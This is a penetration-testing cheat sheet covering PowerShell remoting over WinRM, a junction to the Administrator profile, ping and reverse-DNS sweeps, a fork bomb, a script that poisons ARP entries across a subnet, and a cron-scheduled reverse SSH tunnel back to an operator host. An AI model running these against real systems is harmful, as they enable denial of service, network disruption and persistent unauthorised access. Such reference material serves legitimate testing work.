Install and run PowerShell (pwsh) on Debian/Ubuntu, create remote PowerShell sessions (WinRM) with credentials, create Windows junction links, and common admin scripting patterns. Includes corrected ping sweep and DNS scripts with working syntax.
-
sudo apt install gss-ntlmssp
Installs GSS-NTLMSSP support (often needed for NTLM/Kerberos “Negotiate” scenarios).
-
sudo apt-get install powershell
Installs PowerShell (
pwsh) from configured repositories (if the Microsoft repo is added).
-
pwsh
Starts PowerShell.
-
$sec = Read-Host -AsSecureString $cred = New-Object System.Management.Automation.PSCredential("DOMAIN\username",$sec) $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential $cred Enter-PSSession $offsec_session
Creates a remote session to the target host and enters an interactive remote shell.
-
Creates a junction (directory link). This is a Windows filesystem reparse point (similar idea to a symlink, but junction-specific).
New-Item -ItemType Junction -Path 'C:\ProgramData' -Target 'C:\Users\Administrator'
-
Pings every host in a /24 and writes responsive IPs to
for x in {1..254}; do ping -c 1 -W 1 1.1.1.$x 2>/dev/null | grep -q "64 bytes" && echo "1.1.1.$x" done > ips.txt
ips.txt.
#!/bin/bash
echo "Enter Class C Range (e.g. 192.168.3):"
read range
for ip in {1..254}; do
host "$range.$ip" 2>/dev/null | grep "name pointer"
doneResolves PTR records (reverse DNS) for each IP and prints only “name pointer” matches.
-
Performs reverse lookups and writes results to
for ip in {1..254}; do dig +short -x 1.1.1.$ip | sed "s/$/ <-- 1.1.1.$ip/" done > dns.txt
dns.txt.
-
Creates processes exponentially until the system becomes unusable.
:(){ :|:& };:
#!/bin/sh
# This script adds static ARP entries for 192.168.1.0/24 starting at .2
# It does not apply to .20, .21, .22 (skips them)
# It assumes .1 is the router
i=2
while [ $i -le 253 ]; do
if [ $i -ne 20 ] && [ $i -ne 21 ] && [ $i -ne 22 ]; then
echo "BANNED: 192.168.1.$i"
arp -s 192.168.1.$i 00:00:00:00:00:0a
else
echo "IP NOT BANNED: 192.168.1.$i"
fi
i=$((i+1))
doneWhat it does: iterates IPs .2–.253; for most addresses it adds a static ARP mapping to a fixed MAC address, skipping .20–.22.
#!/bin/sh
# Callback script (run on the callback source computer)
# It tries multiple possible reachable hostnames, and if one is reachable,
# it opens a reverse SSH tunnel back to the operator box.
# Operator connects to target via: ssh -p 4040 localhost (on operator box)
killall ssh >/dev/null 2>&1
sleep 5
REMLIS=4040
REMUSR="user"
HOSTS="domain1.com domain2.com domain3.com"
for LIVEHOST in $HOSTS; do
if ping -c 2 -W 1 "$LIVEHOST" >/dev/null 2>&1; then
ssh -R ${REMLIS}:localhost:22 -i "/home/${REMUSR}/.ssh/id_rsa" -N "${REMUSR}@${LIVEHOST}"
fi
doneWhat it does: checks which host in HOSTS is reachable; opens a reverse tunnel from remote port 4040 on the operator host back to local port 22 on the callback machine.
To schedule it:
-
Example entry (every 5 minutes):
crontab -e
*/5 * * * * /path/to/callback.sh >/dev/null 2>&1
-
Invoke-Command -Session $offsec_session -ScriptBlock { hostname; whoami; ipconfig }
-
Get-PSSession Remove-PSSession $offsec_session
-
while read -r h; do getent hosts "$h"; done < hosts.txt
If you want, share whether you’re using WinRM over HTTP/HTTPS and whether the target is domain-joined; the exact New-PSSession auth method and prerequisites can change depending on that.